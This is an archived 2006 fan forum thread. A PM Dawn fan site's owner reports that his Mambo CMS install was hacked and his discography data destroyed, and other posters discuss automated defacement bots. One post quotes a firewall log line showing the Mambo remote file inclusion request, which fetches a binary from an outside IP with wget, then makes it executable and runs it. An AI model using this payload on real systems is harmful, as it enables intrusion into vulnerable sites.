PDA

View Full Version : Some Asshole Hacked Pmdaw.net



Brian221
03-28-2006, 12:59 PM
Blew up mambo...I restored some stuff...the discography was completely destroyed...I doubt I'll ever put the time into replacing it -- site was due for a makeover anyway.

what the fuck is wrong with people.

Chief
03-28-2006, 01:26 PM
stupid..absolutely stupid

xtristessax
03-28-2006, 02:08 PM
i was just on there last night and it was fine, when did this happen?

Mistress M
03-28-2006, 03:40 PM
Wow. People must be really bored.

Terrick
03-28-2006, 04:38 PM
who would ever think to hack a pm dawn site anyway?

Harmeister
03-28-2006, 05:12 PM
it's not that he attacked the pmdawn.net site because of what it was, it's just that it was vulnerable.

you do a sequential IP sweep, along with a port scan sweep, and if stuff hasn't been patched... well, they feel it's open game to deface it.

Who claimed credit brian? (They usually leave their tag around for everyone to see)

Brian221
03-28-2006, 05:42 PM
http://www.carhifi-forum.de/modules/eBoard/shadow.htm
:ahole:
Bastard hacked over 200 sites TODAY...3000 this month...

SaintHax
03-28-2006, 06:24 PM
http://www.carhifi-forum.de/modules/eBoard/shadow.htm
:ahole:
Bastard hacked over 200 sites TODAY...3000 this month...


This stuff is usually automated now, the bots run a google search for a string matching the exploitable site, they then go out and hit the site with a generic string of code that usually does a database injection of html code, and reports back with a list of hacked sites for that run. It’s insane, the firewalls pickup about 10-20 exploit attempts to my servers daily.

“hacking” has become so brainless and automated that it’s not even cool anymore when someone says they “hacked” a site.

pmFan
03-28-2006, 08:40 PM
i was just on there last night and it was fine, when did this happen?I noticed it around midnight (and messaged Brian). That sucks!

Was it just the Mambo stuff? I noticed that the opening page was fine, but anything under Mambo was hosed. Was it some vulnerability in Mambo?

Is all of the data gone? How about the samples?

Brian221
03-29-2006, 11:11 AM
Yes, only mambo was affected -- and the data is mostly gone (at least the discography stuff is) - but all the samples are physical mp3s, so they weren't affected.

Think that pissed me off the most is that I put about 30 hours into the discography...gone.

Cozmo D
03-30-2006, 01:54 PM
Yeah, I went through a solid month of assholes hacking my site through our cubecart software in January. Not fun! :pissed:

filmwizdaddy
03-30-2006, 05:32 PM
Dang......what to do. :(

SaintHax
04-02-2006, 03:25 PM
got this off one of my firewalls from yesterday, is the mambo exploit trying to reach one of my servers...several of them with various strings were looking in directories named "mambo", "cvs/mambo", and "articles/mambo".

index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://204.83.56.144/cmd.gif?&cmd=cd%20/tmp;wget%20204.83.56.144/gicupo;chmod%20744%20gicupo;./gicupo;echo%20YYY;echo| HTTP/1.1

some of those commands are *nix only, probably a different string for the windows exploit.

TrEEtheRealest
04-03-2006, 03:23 AM
Aww you gotta be an ass to hack a PM DAWN site. It's like picking on the nicest kid in school. :(

Louis85
04-03-2006, 12:54 PM
That sux. Now I have to check my other sites. Bastards.

Hero1
04-03-2006, 08:32 PM
brian u tried archive.org ing the discography

Brian221
04-04-2006, 10:03 AM
Unfortunately, it wouldn't do me much good -- I would be able to see the pages at archive.org, but wouldn't be able to extract it into my database -- its going to need to be manually created again.